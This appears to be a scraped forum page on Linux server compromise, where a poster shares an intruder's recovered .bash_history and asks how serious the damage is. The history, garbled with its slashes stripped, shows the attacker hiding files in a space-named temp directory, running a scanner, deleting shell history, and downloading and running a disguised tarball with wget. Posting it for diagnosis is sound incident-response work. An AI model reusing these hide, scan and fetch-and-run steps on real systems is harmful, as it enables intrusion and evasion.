| PLEX86 | ||
|
odd cron job using access.log by testuser

changing root password with Knoppix 926 You are in a race. As quickly as you fix the cracker can undo your fix. At least take it off the net for a while while you fix the cracks. As a minimal...
Uh oh. I think I know what's going on, but in my inexperience, it's only a guess. I could use some confirmation and opinions regarding extent of the damage. I looked in /home/testuser at the .bash_history and found the following:

changing root password with Knoppix I recently just had a FC2 box hacked. Unfortunately we simply can't take it offline at the moment because we have outside people needing to use files on it. I'm...

changing root password with Knoppix 928 Maybe you've got a specially built Linux installation where passwd(8) is a statically linked binary that just...

w ps -x cd-tmp-." ";ls -aF cd w00t;ls wc -l 0.txt 1.txt 2.txt 3.txt 4.txt 5.txt 6.txt 7.txt 8.txt 9.txt 10.txt 11.txt 12.txt 13.txt 14.txt 15.t .. snip .. 183.txt 184.txt 185.txt 186.txt 187.txt rm .bashhistory cd rm .bashhistory exit w ps -x cd-tmp-." "-w00t;ls exit w ps -x cd-tmp-." ";ls -aF cd w00t;ls wc -l 0.txt 1.txt 2.txt 3.txt 4.txt 5.txt 6.txt 7.txt 8.txt 9.txt 10.txt 11.txt 12.txt 13.txt 14.txt 15. .. snip .. txt 254.txt 255.txt cat 0.txt clear ls ls wc -l uniq.txt cat 0.txt 1.txt 2.txt 3.txt 4.txt 5.txt 6.txt 7.txt 8.txt 9.txt 10.txt 11.txt 12.txt 13.txt 14.txt 15.txt .. snip .. txt 239.txt 240.txt 241.txt 242.txt 243.txt 244.txt 245.txt 246.txt 247.txt 248.txt 249.txt 250.txt 251.txt wc -l uniq.txt rm 0.txt 1.txt 2.txt 3.txt 4.txt 5.txt 6.txt 7.txt 8.txt 9.txt 10.txt 11.txt 12.txt 13.txt 14.txt 15.txt .. snip .. 245.txt 246.txt 247.txt 248.txt 249.txt 250.txt 251.txt 252.txt 253.txt 254.txt 255.txt ls wc -l uniq.txt ls .-eigei 100 & ps -x ls exit ps -x exit w ps -x cd-tmp-." ";ls -af cd w00t;ls cat vuln.txt wc -l vuln.txt ps -x exit w ps -x cd-tmp-." "-woot;ls cd-tmp-." "-w00t;ls cat vuln.txt mv 0 pscan2;ls wc -l uniq.txt .-eigei 100 & exit w ps -x cat-tmp-." "-w00t-vuln.txt ls-tmp-." "-w00t exit w ps x kill -9 31257 31256 passwd sbin-ifconfig grep inet catproc-cpuinfo w uname -a w ps x catproc-cpuinfo w ps x catproc-cpuinfo w ps x catproc-cpuinfo ls -a cdvar-tmp ls -a mkdir ." " cd ." " ls -a tar zxvf omar.tar.gz rm -rf omar.tar.gz cd .f mv x bash export PATH="." bash w ps x ls -a catproc-cpuinfo ls - a ls -a cdvar-tmp ls -a cd ." " ls -a cd .f ls -a export PATH="." bash w ps x catproc-cpuinfo w ps x cdvar-tmp ls -a cd ." " ls -a catetc-hosts catproc-cpuinfo ls-a cd .f ls -a export PATH="." bash w ps x cdvart-emp ls -acdvar-tmp ls -a cdvar-tmp ls -a catetc-hosts ls -a rm -rf ." " sbin-ifconfig -a grep inet catproc-cpuinfo ls- a ls- a wget archive.lydo.org-omar1.tgz tar zxvf omar1.tgz rm -rf omar1.tgz cd .f mv x bash .-bash ps x kill -9 2591 export PATH="." bash

need help with root hack I think that's what happened. Pretty sure. I'm pretty newbie with Linux security, but the following seems pretty obvious to me. I guess I could use some suggestions regarding how serious this is...